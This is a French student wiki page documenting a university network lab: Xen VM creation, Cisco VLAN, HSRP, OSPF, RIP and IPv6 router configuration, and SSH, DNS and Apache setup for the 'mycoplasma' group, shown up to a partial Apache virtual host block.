		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52026"/>
				<updated>2020-01-05T16:48:50Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
